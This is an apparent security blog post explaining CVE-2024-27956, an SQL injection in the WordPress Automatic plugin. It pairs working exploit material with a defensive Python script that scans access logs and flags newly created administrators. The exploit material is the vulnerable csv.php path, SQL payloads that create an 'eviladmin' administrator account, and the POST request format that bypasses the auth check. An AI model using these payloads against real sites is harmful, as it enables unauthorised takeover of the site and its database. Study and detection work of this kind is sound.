SQL Vulnerability in WordPress Automatic Plugin (CVE-2024-27956)

Overview

RoadToOSCP
Aug 18, 2024

The WordPress Automatic plugin, a popular tool for automating content posting on WordPress sites, contains a critical SQL injection vulnerability. Tracked as CVE-2024-27956, it allows an attacker to execute arbitrary SQL commands against the site's database, with consequences that range from data breaches and unauthorized access to full site takeover.

Vulnerability Details

  • CVE ID: CVE-2024-27956
  • Plugin Affected: WordPress Automatic (all versions before the patched release)
  • Type: SQL Injection (SQLi)
  • Severity: High (CVSS Score: 8.7)

Vulnerable file to look for:

/wp-content/plugins/wp-automatic/inc/csv.php

The part of csv.php that causes the problem:

From the code it is evident that the q parameter is passed straight to the database as a complete query, which is then executed. One way to use this is to insert a user of our choice into the WordPress site and then give that user administrator privileges:

q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com', 'http://127.0.0.1:8000', '2024-08-18 14:26:43', 0, 'eviladmin')
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

The question now is how to get this query processed, since we don't have the target site's password. Let's look at the code in csv.php:

So if the MD5 of the query value combined with the password matches the integ parameter, the query is executed. We can therefore craft our POST request as:

q={{query}}&auth=%00&integ={{md5query}}
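From a defender's side, the two things worth looking for are requests to the csv.php file named above and the kind of account the payload above creates: an administrator row in wp_users whose wp_capabilities meta was written outside the normal registration flow. The script below is an added example (not code from the original post or from the plugin) that does both over constructed inputs: it scans Apache/Nginx combined-format access-log lines for hits on the vulnerable path, and it parses the PHP-serialized wp_capabilities value (both the `b:1;` form WordPress writes and the `s:1:"1"` form used in the payload above) to flag administrator accounts registered after a chosen date. The log lines, IP addresses and user rows are constructed sample data.

```python
import re
from datetime import datetime
from posixpath import normpath
from urllib.parse import unquote

# The vulnerable script from the post; any request to it deserves a look.
VULN_SUFFIX = "/wp-automatic/inc/csv.php"

# Apache/Nginx "combined" log format: ip ident user [ts] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not from the original post).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Aug/2024:14:26:40 +0000] "POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.2 - - [18/Aug/2024:14:27:01 +0000] "GET /wp-login.php HTTP/1.1" 200 3312 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Aug/2024:14:27:05 +0000] "POST /blog/wp-content/plugins/wp-automatic/inc/%63sv.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
"""


def find_csv_requests(log_text):
    """Return one dict per request whose (decoded, normalized) path hits csv.php."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        raw_path = m.group("path").split("?", 1)[0]
        # Decode %-escapes and collapse ./ and ../ so trivial obfuscation still matches.
        path = normpath(unquote(raw_path))
        if path.lower().endswith(VULN_SUFFIX):
            hits.append({
                "ip": m.group("ip"),
                "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
                "method": m.group("method"),
                "path": path,
                "status": int(m.group("status")),
            })
    return hits


# wp_capabilities is a PHP-serialized array: a:1:{s:13:"administrator";b:1;}
# WordPress writes the role flag as b:1; the payload in the post writes s:1:"1";
# PHP treats both as true, so a role counts as granted in either form.
CAP_RE = re.compile(r's:\d+:"([^"]*)";(?:b:1;|s:\d+:"1";)')


def roles_from_capabilities(serialized):
    """Extract the granted role names from a serialized wp_capabilities value."""
    return set(CAP_RE.findall(serialized))


# Constructed sample rows of (user_login, user_registered, wp_capabilities),
# i.e. wp_users joined with the wp_capabilities row of wp_usermeta.
SAMPLE_USERS = [
    ("admin", "2021-03-02 10:00:00", 'a:1:{s:13:"administrator";b:1;}'),
    ("editor1", "2023-05-11 09:30:00", 'a:1:{s:6:"editor";b:1;}'),
    ("eviladmin", "2024-08-18 14:26:43", 'a:1:{s:13:"administrator";s:1:"1";}'),
]


def recent_admins(rows, since):
    """Logins holding the administrator role and registered on/after `since` (YYYY-MM-DD)."""
    cutoff = datetime.strptime(since, "%Y-%m-%d")
    flagged = []
    for login, registered, caps in rows:
        reg = datetime.strptime(registered, "%Y-%m-%d %H:%M:%S")
        if "administrator" in roles_from_capabilities(caps) and reg >= cutoff:
            flagged.append(login)
    return flagged


if __name__ == "__main__":
    for hit in find_csv_requests(SAMPLE_LOG):
        print(f"{hit['time']:%Y-%m-%d %H:%M:%S} {hit['ip']} {hit['method']} {hit['path']} -> {hit['status']}")
    print("administrators registered since 2024-08-01:", recent_admins(SAMPLE_USERS, "2024-08-01"))
```

On a real site the user rows come from `SELECT u.user_login, u.user_registered, m.meta_value FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID WHERE m.meta_key = 'wp_capabilities'` (adjust the table prefix if it is not `wp_`), and the log scan is only as good as the retention of your access logs: the POST body carrying the q parameter is not logged by default, so the path hit is the signal to pivot on.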

Attacking Demo:

Happy Hacking.
